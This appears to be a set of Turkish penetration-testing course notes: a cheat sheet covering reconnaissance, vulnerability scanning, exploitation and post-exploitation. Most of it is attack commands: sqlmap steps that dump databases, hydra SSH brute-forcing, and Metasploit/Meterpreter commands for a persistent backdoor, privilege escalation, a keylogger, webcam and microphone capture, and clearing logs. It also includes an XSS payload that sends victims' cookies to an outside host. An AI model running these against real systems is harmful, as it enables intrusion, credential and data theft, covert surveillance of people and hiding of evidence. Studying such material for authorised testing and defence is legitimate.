Bolum 4: Gizliligin Saglanmasi
- Torghost: Dynamic IP changer over tor (https://github.com/SusmithKrishnan/torghost)
Bolum 5: Bilgi Toplama
-
Dnsenum, dnsmap: DNS haritalari
-
Dmitry -winsepfb: Information gathering (including netcraft, whois, subdomain, port, DNS)
-
Netdiscover: LAN aktif cihaz [nmap -sP WANIP]
-
Nmap scripts
http-waf-detect: Firewall tespit
http-waf-fingerprint: Firewall turu tespit
Bolum 6: Guvenlik Acigi Tespiti
- Nessus: Ucretli bir web, linux, windows tarayicisidir.
- OpenVAS(greenbone): Ucretsiz bir tarayici
- ZaProxy: Ucretsiz web-app scanner. {Auto-manuel farki sudur: auto’da kullanici girisi gereken yerler taranmaz}
- SkipFish: Google’in web arayuzlu web-app tarayicisi
Bolum 7: Guvenlik Acigi Istismari
-
Metasploit
- msfconsole: Start metasploit
- search: Exploit search
- use []: Use exploit
- info: Info about exploit
- show options: Secenekler
- sessions -i: Session’lari goster
- sessions -i []: Session’a gec
- background: Background session
-
XSS
<script a=">" src="siteadi"> var xmlHTTP = new XMLHttpRequest(); xmlHttp.open("GET",'<http://site/kayit.php?cookie='+document.cookie>); xmlHttp.send(null); -
LFISuite: get-pip.py dosyasi indirilmeli:
curl <https://bootstrap.pypa.io/get-pip.py> - Sqlmap
- -u: URL
- —batch: Def. setup - no user input
- —dbs: Database
- -D: Database name
- —tables: Tables
- -T: Table name
- —columns: Columns
- —dump: Dump info
Sqlmap Kullanim:
- sqlmap -u [URL] —batch —dbs
- sqlmap -u [URL] -D {db} —tables
- sqlmap -u [URL] -D {db} -T {table} —columns
- sqlmap -u [URL] -D {db} -T {table} -C {columns} —dump
- Path Traversal: Erisilmemei gereken dosyalara dizindeki aciklara sayesinde ulasmaktir
- Command Execution: Sistemde URL uzerinde kod calistirilmasini saglayan acik turudur.
Bolum 8: Istismar Sonrasi
Meterpreter Oturumu: Sistemce canli msf-shell oturumudur
getuid: Oturum kontrolu
search windows/local/ -> Windows post-exploit-
setoolkit 1-4-2 ile trojan olusturulur
-
run persistence ile kalici arka kapi olusturulur
-A: multi-handler
-U: Start on log-on
-p: port
-i: interval (time)
-r: MSF ip
Msf Escalationlar:
- getsystem (1. ram,system pipe 2.harddisk,dll start 3.ram, inject dll tool)
- migrate (Baska bir process’e bulasma
- exploit
Arka kapi tekrar baglanma:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options - set options
exploitIstismar
-
Dosya
- search -f *.txt
- download -r dosya localpath
- upload -r localpath dosya
-
Goruntu
- screenshot -p (localpath) -q (quality) -v (opennow)
- record_mic -d (sn) -f (localpath)
- webcam_list: listeleme
- webcam_snap: anlik goruntu
- webcam_stream: kayit
- webcam_chat: goruntulu konusma
-
Keylogger
- keyscan_start
- keyscan_dump
- keyscan_stop
-
Ayrilma
- clearev: Loglari temizleme
- kill -s: Kill session
Parola Saldirilari
-
crunch
-t -o <output_file> (@→ wildcard) -
hydra -s
-V (verbose) -L /login/path -P /password/path -e (additional checks) t -
mysql -h
-u -p -
SSH Username: auxiliary/scanner/ssh/ssh_enumusers | USER_FILE && REMOTE_HOST >>> sshusers.txt
-
SSH Password: hydra -s 22 -V -L ./sshusers.txt -P ./unix_passwords.txt /e n -t 8
ssh - ssh baglanma: ssh user@ip
NOT: Hydra cok hizli bir program oldugu icin bazen user:pass bulamayabilir veya eksik bulabilir. Bu durumda -t parametresiyle islem hizi yavaslatilir.
Additional cheks:
n→null password
s→username as password
r→reverse login password